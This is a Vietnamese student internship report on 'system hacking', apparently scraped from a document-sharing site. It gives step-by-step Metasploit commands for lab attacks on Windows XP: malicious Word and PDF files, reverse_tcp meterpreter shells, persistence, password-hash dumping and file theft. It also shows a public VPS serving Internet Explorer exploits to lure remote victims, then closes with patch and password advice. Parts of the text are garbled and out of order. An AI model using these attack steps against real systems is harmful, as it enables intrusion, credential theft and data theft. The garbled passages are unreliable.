Đang tải... (xem toàn văn)
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức.
System Hacking Athena Center MỞ ĐẦU Theo thống kê công ty Bkav, từ đầu năm 2013 đến nay, Việt Nam có 2.405 website quan, doanh nghiệp bị xâm nhập, trung bình tháng có khoảng 300 website bị cơng Ơng Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển Bkav cho biết, quan doanh nghiệp bị cơng gần đầy đủ, từ nghiêm trọng đến nghiêm trọng nghiêm trọng (nhằm đánh cắp tài liệu mật) mã độc nhắm vào Bộ Cơng An, Bộ Quốc phịng, ngân hàng, quan đơn vị nghiên cứu, doanh nghiệp…Theo nhìn nhận Bkav, có chiến dịch cơng, phát tán mã độc có chủ đích vào Việt Nam Trong đó, thân vụ cơng mạng vụ xâm nhập hệ thống công nghệ thông tin nhằm thám, trục lợi, phá hoại liệu, ăn cắp tài sản, cạnh tranh không lành mạnh số vụ an tồn thơng tin số khác gia tăng mức báo động số lượng, đa dạng hình thức, tinh vi công nghệ Hiện nay, thiết bị máy tính PC, laptop, có kết nối mạng nội kết nối Internet Trên thiết bị này, hầu hết cài đặt phần mềm ứng dụng IE, Microsoft Office, Adobe Reader ,… chạy hệ điều hành Windows XP, Windows 7… Tuy nhiên, ứng dụng có lổ hổng mà hacker xâm nhập khai thác Q trình khai thác diễn âm thầm mà hầu hết nạn nhân biết cho dù thường xuyên update chương trình diệt virus nhiều người suy nghĩ Trong thời gian vừa qua, với hướng dẫn trung tâm Athena tài liệu nghiên cứu qua, phần tơi nắm phương pháp mà hacker (Nói riêng Hacker Việt Nam) hay dùng để xâm nhập hệ thống qua lổ hổng nêu tổng hợp lại để tìm phương hướng giải Tơi xin cam kết, kết đạt tự thực hướng dẫn thầy Võ Đỗ Thắng SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TPHCM Em xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên TPHCM khoa Điện Tử Viễn Thông tạo điều kiện cho em hoàn thành tốt đợt Thực Tập Trong đợt thực tập cho em kinh nghiệm quý báu Những kinh nghiệm giúp Em hồn thiện cơng việc mơi trường làm việc sau Mặc dù em cố gắng hoàn thành báo cáo thực tập với tất nổ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Em mong nhận đóng góp, chia sẻ để em làm tốt Một lần em xin chân thành cảm ơn TPHCM, ngày 22 tháng 10 năm 2014 Sinh viên thực tập Huỳnh Dương Khang SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center LỜI CẢM ƠN TRUNG TÂM ATHENA Em xin cảm ơn giám đốc Trung Tâm Quản Trị Mạng An Ninh Mạng Quốc Tế Athena, anh chị trung tâm Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng nhiệt tình giúp đỡ hướng dẫn em suốt thời gian thực tập Thầy tạo điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết đóng góp ý kiến quý báu để hoàn thành tốt báo cáo Em xin gửi lời cám ơn đến anh chị, bạn bè truyền đạt kinh nghiệm tạo điều kiện cho em hoàn thành đề tài Trong q trình thực đề tài khơng thể khơng có sai sót, mong thầy trung tâm ATHENA bạn thẳng thắn góp ý đề em rút kinh nghiệm cơng trình tìm hiểu, phát triển sau Một lần em xin chân thành cảm ơn TPHCM, ngày 22 tháng 10 năm 2014 Sinh viên thực tập Huỳnh Dương Khang SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực CNTT, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đưa công nghệ thông tin ngành kinh tế mũi nhọn, góp phần phát triển nước nhà Lĩnh vực hoạt động chính: – Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phịng, Bộ Cơng An , ngân hàng, doanh nghiệp, quan phủ, tổ chức tài – Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thơng Tin - Bộ Quốc Phịng , Bộ Cơng An, Sở Thông Tin Truyền Thông tỉnh, bưu điện tỉnh,… – Ngồi chương trình đào tạo, Trung tâm ATHENA cịn có nhiều chương trình hợp tác trao đổi công nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thơng, Hiệp hội an tồn thơng tin (VNISA), Viện Kỹ Thuật Quân Sự , Đội ngũ giảng viên : – Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trường đại học hàng đầu nước Tất giảng viên ATHENA phải có chứng quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,có sư phạm Quốc tế (Microsoft Certified Trainer).Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy trung tâm ATHENA SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center – Bên cạnh đó,Các giảng viên ATHENA thường tu nghiệp cập nhật kiến thức công nghệ từ nước tiên tiến Mỹ , Pháp, Hà Lan, Singapore, truyền đạt công nghệ chương trình đào tạo trung tâm ATHENA Liên hệ: – Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1, TPHCM Điện thoại: 0907879477 0943230099 (08)38244041 Gần ngã tư Đinh Tiên Hồng - Nguyễn Đình Chiểu – Cơ sở 2: Bis Đinh Tiên Hoàng, phường Đa Kao, Q1, TPHCM Điện thoại: 0943200088 (08)22103801 Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét – Website: http://athena.edu.vn http://athena.com.vn – E-mail : support@athena.edu.vn tuvan@athena.edu.vn SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center NHẬN XÉT CỦA KHOA TPHCM, ngày tháng năm 2014 SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center NHẬN XÉT CỦA CÔNG TY THỰC TẬP TPHCM, ngày tháng năm 2014 Giám đốc SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TPHCM, ngày tháng năm 2014 Giảng viên hướng dẫn SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center MỤC LỤC MỞ ĐẦU LỜI CẢM ƠN TRUNG TÂM ATHENA GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP NHẬN XÉT CỦA KHOA NHẬN XÉT CỦA CÔNG TY THỰC TẬP NHẬN XÉT CỦA GIẢNG VIÊN HƢỚNG DẪN PHẦN 1: GIỚI THIỆU 11 Giới thiệu System hacking 11 Các lỗ hổng thƣờng khai thác hệ điều hành Windows 11 Q trình cơng vào hệ thống 13 PHẦN 2: TIẾN TRÌNH NGHIÊN CỨU VÀ THỰC HÀNH 15 Chƣơng 1: VMware ảo hóa hệ điều hành 15 Giới thiệu VMware 15 Khái quát VMware máy ảo 16 Chƣơng 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 19 Hệ điều hành Backtrack R3 19 Phần mềm Metasploit 20 Sử dụng Metasploit Framework: 21 2.1 Chọn module exploit: Lựa chọn chƣơng trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác 21 2.2 Cấu hình Module exploit chọn: 22 2.3 Verify options vừa cấu hình: 22 2.4 Lựa chọn target: 22 2.5 Lựa chọn payload: 22 2.6 Thực thi exploit: 22 Sơ đồ tổng quan hệ thống mạng LAN 23 Xâm nhập khai thác Windows XP 24 4.1 Khai thác lổ hỏng Ms10-042 24 4.2 Khai thác lổ hỏng Ms12-004 28 SVTH: Huỳnh Dương Khang Trang System Hacking Athena Center 4.3 Khai thác lổ hỏng file PDF qua Adobe Reader 9.x 29 4.4 Khai thác lỗ hỏng Ms12-027 34 4.5 Khai thác thông tin sau công: 38 Chƣơng 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET 40 Máy Chủ Ảo (VPS) 40 1.1 Định nghĩa 40 1.2 Đặc điểm thông số VPS 40 Honeypot 41 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet 41 Tấn công qua Internet 42 4.1 Các lỗi bảo mật: 42 4.2 Cách công: 44 4.3 Phƣơng pháp khắc phục lỗ hổng 45 PHẦN 3: TỔNG KẾT 46 DANH MỤC TÀI LIỆU THAM KHẢO 47 SVTH: Huỳnh Dương Khang Trang 10 System Hacking Athena Center Tạo trình lắng nghe msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.119.132 msf exploit(handler) > exploit Kiểm tra máy hacker ta thấy mã độc tiêm vào máy nạn nhân Mã độc tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1210 Giờ ta khai thác máy nạn nhân SVTH: Huỳnh Dương Khang Trang 33 System Hacking Athena Center Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta hồn tồn kiểm xốt máy nạn nhân 4.4 Khai thác lỗ hỏng Ms12-027 Mô tả: Nguyên tắc khai thác lỗi đơn giản, bạn tạo file mã độc có doc gửi cho nạn nhân, làm để nạn nhân nhận mở file có chứa mã độc lên (các bạn tạo web server giả mạo, dụ nạn nhân tải file gửi kèm theo mail, …) máy nạn nhân sử dụng Microsoft Office 2007 (no-SP/SP1/SP2/SP3) Windows (XP SP3 / SP1) English máy nạn nhân bị “nhiễm độc” Mơ hình Lab Máy Hacker: Hệ điều hành: Sử dụng Backtrack IP: 192.168.119.132 Máy nạn nhân: Hệ điều hành: Sử dụng Windows XP IP: 192.168.119.129 Cách khai thác: Mở Metasploit Backtrack lệnh: msfconsole Từ dấu nhắc sử dụng lệnh để search mã lỗi msf msf > search ms12_027 copy đường dẫn, enter gõ use “dán đường dẫn vào” SVTH: Huỳnh Dương Khang Trang 34 System Hacking Athena Center msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy option lỗi msf exploit(ms12_027_mscomctl_bof) > show options Ở ta thấy bắt buộc phải tạo FILENAME Lần lượt gõ lệnh: msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc Ta thấy có file filemadoc.doc tạo (đây ví dụ bạn đặt tên theo ý thích) msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132 Địa địa IP máy Hacker máy BackTrack msf exploit(ms12_027_mscomctl_bof) > exploit Gõ lệnh exploit để thực thi msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc /root/Desktop ta copy file “filemadoc.doc” tạo Desktop cho dễ sử dụng SVTH: Huỳnh Dương Khang Trang 35 System Hacking Athena Center Vậy việc tạo file chứa mã độc xong, ta gửi file cho nạn nhân để nạn nhân chạy file bị dính mã độc Trong mơi trường lab nên dựng Webserver để nạn nhân truy cập vào Máy BackTrack hỗ trợ sẵn cho ta Webserver ta việc chạy Upload file “filemadoc.doc” lên Webserver cách đưa vào thư mục “/var/www” Start Webserver ảo lệnh root@bt:~# service apache2 start * Starting web server apache2 [ OK ] Tạo trình lắng nghe msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.119.132 msf exploit(handler) > exploit SVTH: Huỳnh Dương Khang Trang 36 System Hacking Athena Center Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta dựng tải file “filemadoc.doc” Khi nạn nhân mở file lên mã độc tiêm vào Kiểm tra máy hacker ta thấy mã độc tiêm vào máy nạn nhân SVTH: Huỳnh Dương Khang Trang 37 System Hacking Athena Center Mã độc tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1040 Giờ ta khai thác máy nạn nhân Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta hồn tồn kiểm xốt máy nạn nhân 4.5 Khai thác thông tin sau công: Xem thông tin hệ thống: > getuid > sysinfo Tải lên đánh cắp tài liệu – Tải file abc.txt Desktop Back Track lên ổ C XP > upload /root/Desktop/abc.txt C:/ – Đánh cắp file xyz.txt ổ C XP đem Desktop Back Track > download C:/xyz.txt /root/Desktop Lấy hashpass: > haskdump Khám phá ổ đĩa: meterpreter> shell SVTH: Huỳnh Dương Khang Trang 38 System Hacking Athena Center – Chuyển dấu nhắc sang ổ đĩa C: > cd c:\ – Liệt kê tài nguyên ổ C: > dir – Tạo thư mục abc ổ C: > md abc – Xóa thư mục abc ổ C: > rd abc – Xóa file abc.txt ổ C: > del abc.txt – Trở meterpreter: > exit Giữ kết nối với Victim Victim mạng hay khởi động lại port 7777 > run persistence -A -S -U -X -i 1500 -P 7777 SVTH: Huỳnh Dương Khang Trang 39 System Hacking Athena Center Chương 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET Máy Chủ Ảo (VPS) 1.1 Định nghĩa Máy chủ ảo (Virtual Private Server -VPS) phương pháp phân chia máy chủ vật lý thành nhiều máy chủ ảo Trong server chạy Share Host có hàng trăm tài khoản chạy lúc, server chạy VPS số 1/10 Do vậy, VPS có hiệu cao Share Host nhiều Mỗi máy chủ hệ thống hồn tồn riêng biệt, có hệ điều hành riêng, có tồn quyền quản lý root restart lại hệ thống lúc Do vậy, VPS hạn chế 100% khả bị hack local Trên server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, Website bị công Ddos, botnet mạnh làm ảnh hưởng đến Website khác server, riêng server VPS, tài khoản VPS bị cơng tài khoản khác VPS hoạt động bình thường VPS dành cho doanh nghiệp vừa trang Web lớn mã nguồn nặng, chạy Share Host khơng đáp ứng đủ u cầu.Tuy nhiên, VPS địi hỏi người sử dụng phải có thêm số kiến thức bảo mật, cấu hình server,… 1.2 Đặc điểm thơng số VPS Hoạt động hồn tồn server riêng nên sở hữu phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa IP hệ điều hành riêng Tiết kiệm nhiều chi phí so với việc th server riêng Ngồi việc dùng VPS để thiết lập Web Server, Mail Server ứng dụng khác cài đặt để thực yêu cầu riêng truy cập Web trình duyệt Web VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài ngun dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống SVTH: Huỳnh Dương Khang Trang 40 System Hacking Athena Center Có thể cài lại hệ điều hành với thời gian từ 5-10 phút Có tính chất quản lý nội riêng doanh nghiệp Khơng tốn chi phí mua thiết bị, chi phí bảo dưỡng Có thể quản trị từ xa, cài đặt ứng dụng quản trị doanh nghiệp, CRM, quản lý khách hàng, bán hàng trực tuyến Honeypot Honeypot hệ thống tài nguyên thông tin xây dựng với mục đích giả dạng đánh lừa kẻ sử dụng xâm nhập không hợp pháp, thu hút ý chúng, ngăn không cho chúng tiếp xúc với hệ thống thật Hệ thống tài ngun thơng tin có nghĩa Honeypot giả dạng loại máy chủ tài nguyên Mail Server, Domain Name Server, Web Server… Honeypot trực tiếp tương tác với tin tặc tìm cách khai thác thơng tin tin tặc hình thức công, công cụ công hay cách thức tiến hành thay bị cơng Với mục tiêu xây dựng Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker sử dụng Máy chủ ảo (VPS) cài đặt Honeypot để giả dạng Web server bình thường, từ đánh lừa máy nạn nhân máy tính có kết nối Internet truy cập vào địa mà VPS cung cấp Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet Sơ đồ tổng quan sử dụng Honeypot SVTH: Huỳnh Dương Khang Trang 41 System Hacking Athena Center Hacker cần chuẩn bị: VPS có địa IP public, cài đặt sẵn cơng cụ Metasploit (download http://metasploit.org) đóng vai trị Honeypot mạng Tấn công qua Internet 4.1 Các lỗi bảo mật: a) Lỗi bảo mật Ms06-067: Mô tả: – Là lỗi làm cho IE bị tràn đệm, để dựa vào mà cơng thực mã lệnh từ xa Hệ điều hành bị ảnh hưởng: – Windows XP Universal – Windows 2000 Universal – Windows Server 2003 Universal b) Lỗi bảo mật Ms10-046: Mô tả: – Một lỗ hổng công bố công khai Windows Shell Các lỗ hổng cho phép thực thi mã từ xa biểu tượng phím tắt thiết kế đặc biệt hiển thị Một kẻ công khai thác thành công lỗ hổng đạt quyền người dùng tương tự người dùng địa phương Người dùng có tài khoản cấu hình để có quyền sử dụng hệ thống ảnh hưởng so với người dùng hoạt động với người sử dụng quyền hành Phần mềm bị ảnh hưởng: – Windows XP Service Pack – Windows XP Professional x64 Edition Service Pack – Windows Server 2003 Service Pack – Windows Server 2003 x64 Edition Service Pack – Windows Server 2003 with SP2 for Itanium-based Systems – Windows Vista Service Pack and Windows Vista Service Pack SVTH: Huỳnh Dương Khang Trang 42 System Hacking Athena Center – Windows Vista x64 Edition Service Pack and Windows Vista x64 Edition Service Pack – Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack – Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack – Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack – Windows for 32-bit Systems – Windows for x64-based Systems – Windows Server 2008 R2 for x64-based Systems – Windows Server 2008 R2 for Itanium-based System c) Lỗi bảo mật Ms11-003: Mô tả: – Là lỗi dựa CSS IE, khai thác vào lỗ hỏng HTML Khi phân tích trang HTML có chứa hàm đệ quy, hàm bị xóa sau sử dụng lại Phần mềm bị ảnh hưởng: – Internet Explorer – Internet Explorer – Internet Explorer d) Lỗi bảo mật Ms12-063: Mô tả: – Khi tải trang web bình thường có Object với hàm get gọi Object IMSHTCP Nhưng có can thiệp, load trang bất ngờ Object bị xóa sau sử dụng lại, từ Hacker thâm nhập vào Phần mềm bị ảnh hưởng: – Internet Explorer Windown XP SP3 – Internet Explorer Windown XP SP3 – Internet Explorer Windown Vista SVTH: Huỳnh Dương Khang Trang 43 System Hacking Athena Center – Internet Explorer Windown XP SP3 – Internet Explorer Windown – Internet Explorer Windown e) Lỗi bảo mật Ms13-009: Phần mềm bị ảnh hưởng: – Internet Explorer Windown XP SP3 4.2 Cách công: Tại cửa sổ Metasploit console, ta sử dụng lệnh sau để tạo server lắng nghe truy cập từ bên > search Msxy_abc (Với xy_abc lỗi cần khai thác, Ms06_067, Ms10_046, Ms11_003, Ms12_063, Ms13_009) > use exploit/windows/browser/mã_lỗi_khai_thác Với mã lỗi khai thác: Ms06_067: ms06_067_keyframe Ms10_046: ms10_046_shortcut_icon_dllloader Ms11_003: ms11_003_ie_xss_import Ms12_063: ie_execommane_uaf Ms13_009: ms13_009_slayoutrun_uaf > show options (Xem thông tin thiết đặt) > set srvhost 14.0.21.184 (VPS đăng ký với địa IP 14.0.21.184) > set lhost 14.0.21.184 > set uripath test (Đường dẫn kèm theo IP, không set, metasploit chọn ngẫu nhiên đường dẫn bất kỳ) > set srvport 80 SVTH: Huỳnh Dương Khang Trang 44 System Hacking Athena Center (Chọn port 80, VPS Web Server, tránh nghi ngờ người dùng) > set payload windows/meterpreter/reverse_tcp (Cách công vào hệ thống) > exploit Công việc chờ cho máy mục tiêu truy cập vào địa chỉ: http://14.0.21.184/test Ngay lúc đó, server VPS tiến hành gửi trojan máy mục tiêu Bây ta tiến hành khai thác máy mục tiêu 4.3 Phương pháp khắc phục lỗ hổng Ms06-067: Cập nhập hệ điều hành lên phiên Service Pack Ms10-046: tải gói KB286198 để vài đặt vào hệ thống cập nhật hệ điều hành lên phiên hệ điều hành Ms11-003: Cập nhập hệ điều hành lên phiên Ms12-063: tải gói vá lỗi KB2744842 để cài đặt vào hệ thống Ms13-009: tải gói vá lỗi KB2792100 để cài đặt vào hệ thống SVTH: Huỳnh Dương Khang Trang 45 System Hacking Athena Center PHẦN 3: TỔNG KẾT Với kiểu công hệ thống dựa lỗi sai sót q trình sử dụng máy tính lỗi bảo mật vật lý, có số phương pháp nhằm giảm thiểu phòng tránh việc Hacker đánh cắp Mật sau: – Mật phải đặt nhiều ký tự phải tổng hợp chữ hoa, chữ thường, số ký tự đặc biệt để chương trình khó dị – Cấu hình registry cho mật hệ thống windows băm lưu dạng NTLM để chương trình khó khăn để dị tìm – Người dùng admin nên xóa tập tin sam thư mục Windows/repair sau lần backup liệu rdisk Trong q trình sử dụng máy tính để truy cập Internet, cần lưu ý: – Không mở tập tin đính kèm thư điện tử có nguồn gốc khơng rõ ràng không tin cậy – Chắc chắn bạn có bật hệ thống tường lửa cho hệ thống – Đảm bảo Windows bạn cập nhật thường xuyên, phần mềm bảo mật bạn có chức cập nhật "live" (tự động cập nhật trực tuyến) – Cài đặt phần mềm diệt virut Internet Security – Ln sử dụng Office có quyền để cập nhật vá lỗi hỗ trợ kỹ thuật từ nhà cung cấp Microsoft xây dựng loạt công cụ Windows để nhà quản trị người dùng có kinh nghiệm phân tích máy tính xem liệu có bị xâm phạm hay khơng Một nghi ngờ máy tính bị xâm nhập, người dùng sử dụng cơng cụ để tự kiểm tra máy tính có biểu đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find SVTH: Huỳnh Dương Khang Trang 46 System Hacking Athena Center DANH MỤC TÀI LIỆU THAM KHẢO Nguyễn Sơn Khê, Đỗ Tấn Phát, Nguyễn Cao Thắng, Athena – Sử dụng BackTrack khai thác lỗ hổng mạng http://www.hackyshacky.com/2013/03/how-to-hack-facebook-withbacktrack-5.html https://www.youtube.com/watch?v=g1Xo7K2osxE&list=PL6Elfw63yI9RVQ LXsK_V7XyHmiJc_9v56 http://nvkhoiit.blogspot.com/ http://www.slideshare.net/Anhphailamthenao/bo-co-thc-tp-systemhacking?related=5 SVTH: Huỳnh Dương Khang Trang 47 ... THAM KHẢO 47 SVTH: Huỳnh Dương Khang Trang 10 System Hacking Athena Center PHẦN 1: GIỚI THIỆU Giới thiệu System hacking System hacking bao gồm kỹ thuật lấy username, password dựa vào... thành tốt đợt Thực Tập Trong đợt thực tập cho em kinh nghiệm quý báu Những kinh nghiệm giúp Em hồn thiện cơng việc môi trường làm việc sau Mặc dù em cố gắng hoàn thành báo cáo thực tập với tất... Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack – Windows for 32-bit Systems – Windows for x64-based Systems – Windows Server 2008 R2 for x64-based Systems –
